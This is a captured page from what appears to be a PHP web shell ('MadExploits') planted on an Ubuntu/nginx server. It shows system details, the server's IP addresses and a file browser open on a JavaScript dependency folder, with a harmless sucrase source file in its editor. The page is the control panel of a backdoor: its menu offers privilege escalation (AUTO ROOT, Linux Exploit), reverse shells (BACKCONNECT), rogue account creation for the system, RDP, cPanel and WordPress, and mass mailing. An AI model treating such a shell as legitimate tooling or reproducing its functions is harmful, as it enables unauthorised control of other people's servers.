Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
sucrase /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
esm
[ DIR ]
dr-xr-xr-x
parser
[ DIR ]
dr-xr-xr-x
transformers
[ DIR ]
dr-xr-xr-x
types
[ DIR ]
dr-xr-xr-x
util
[ DIR ]
dr-xr-xr-x
CJSImportProcessor.js
15.99
KB
-rw-rw-rw-
HelperManager.js
5.57
KB
-rw-rw-rw-
NameManager.js
927
B
-rw-rw-rw-
Options-gen-types.js
1.71
KB
-rw-rw-rw-
Options.js
675
B
-rw-rw-rw-
TokenProcessor.js
10.26
KB
-rw-rw-rw-
cli.js
10.12
KB
-rw-rw-rw-
computeSourceMap.js
2.56
KB
-rw-rw-rw-
identifyShadowedGlobals.js
3.04
KB
-rw-rw-rw-
index.js
5.28
KB
-rw-rw-rw-
register.js
2.77
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Options-gen-types.js
"use strict";Object.defineProperty(exports, "__esModule", {value: true}); function _interopRequireWildcard(obj) { if (obj && obj.__esModule) { return obj; } else { var newObj = {}; if (obj != null) { for (var key in obj) { if (Object.prototype.hasOwnProperty.call(obj, key)) { newObj[key] = obj[key]; } } } newObj.default = obj; return newObj; } }/** * This module was automatically generated by `ts-interface-builder` */ var _tsinterfacechecker = require('ts-interface-checker'); var t = _interopRequireWildcard(_tsinterfacechecker); // tslint:disable:object-literal-key-quotes const Transform = t.union( t.lit("jsx"), t.lit("typescript"), t.lit("flow"), t.lit("imports"), t.lit("react-hot-loader"), t.lit("jest"), ); exports.Transform = Transform; const SourceMapOptions = t.iface([], { compiledFilename: "string", }); exports.SourceMapOptions = SourceMapOptions; const Options = t.iface([], { transforms: t.array("Transform"), disableESTransforms: t.opt("boolean"), jsxRuntime: t.opt(t.union(t.lit("classic"), t.lit("automatic"), t.lit("preserve"))), production: t.opt("boolean"), jsxImportSource: t.opt("string"), jsxPragma: t.opt("string"), jsxFragmentPragma: t.opt("string"), keepUnusedImports: t.opt("boolean"), preserveDynamicImport: t.opt("boolean"), injectCreateRequireForImportRequire: t.opt("boolean"), enableLegacyTypeScriptModuleInterop: t.opt("boolean"), enableLegacyBabel5ModuleInterop: t.opt("boolean"), sourceMapOptions: t.opt("SourceMapOptions"), filePath: t.opt("string"), }); exports.Options = Options; const exportedTypeSuite = { Transform: exports.Transform, SourceMapOptions: exports.SourceMapOptions, Options: exports.Options, }; exports. default = exportedTypeSuite;
Close